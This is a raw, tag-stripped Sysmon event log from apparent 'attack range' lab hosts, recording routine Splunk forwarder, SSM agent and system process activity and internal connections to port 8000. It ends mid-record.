23542300x8000000000000000223721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:16.463{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE9B5CA77708A995A553F9DD413A725,SHA256=5DA9FAD68CB65EF7E3B0B0094C756DB7EA8EA914AA0A591DDBEB41791B338A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:16.453{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-173MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:16.065{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC1B6A878B55226DE7CA3C4447F2764,SHA256=C23AF0DB311E12F976CD93932FF97752BEBDDF8ADFDDAB624E446630CEBF1AD9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:15.655{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51806-false10.0.1.12-8000- 23542300x8000000000000000223722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:17.697{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D7AF21B76E9E095834368CB1E103A6,SHA256=A871C8B327E322FF4E9051F6B20B7B35E20D5AAD0E5B2E305DE0CCA615F37D63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:15.542{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49677-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:17.066{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFB6679B3AF85429E76071601EA3AECD,SHA256=801060ACD1D1F322F9FEE4D0CE618FC09C539A7C1EFF626807252FA061ED2865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:18.713{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDA671AEF0741F8086853BC8A9D00964,SHA256=1A48DD6B25AEF963D887C26EDCA98C0E81F2C3A08BE9950828A3DCF5013CA773,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:18.066{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7AD72897309FA6518244B14A7C38CD,SHA256=EFDF944B35A0BEDA5B6FA1456B5D1457D923EE29B695144AFCF87DFD152B3D1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:19.947{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4CD645B86C587F359599204F583E032,SHA256=8784E5393D836759F5E1BE04F038F28E0A59DAE2C779685CF3B4D3639EC65AA0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.935{C8EA50B7-1ACB-6216-9007-000000003802}66526636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1ACB-6216-9007-000000003802}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1ACB-6216-9007-000000003802}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.704{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1ACB-6216-9007-000000003802}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.706{C8EA50B7-1ACB-6216-9007-000000003802}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.335{C8EA50B7-1ACB-6216-8F07-000000003802}44201868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B971E3E5A2BC0CA1FDD5F10E88B0978E,SHA256=D92E2E224B19CCAA3187AB07F313684908C4C2BD597C4FAC30217F7B7F19D3AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1ACB-6216-8F07-000000003802}4420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1ACB-6216-8F07-000000003802}4420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.035{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1ACB-6216-8F07-000000003802}4420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:19.039{C8EA50B7-1ACB-6216-8F07-000000003802}4420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:20.962{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82260BECB29B2EC7601E4010C3D166A2,SHA256=4FDD176320D0A1E3E6E520713AA14B75F3AE5113E23A1271CE9C04B0C6736D69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.921{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1ACC-6216-9207-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.921{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:20.921{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 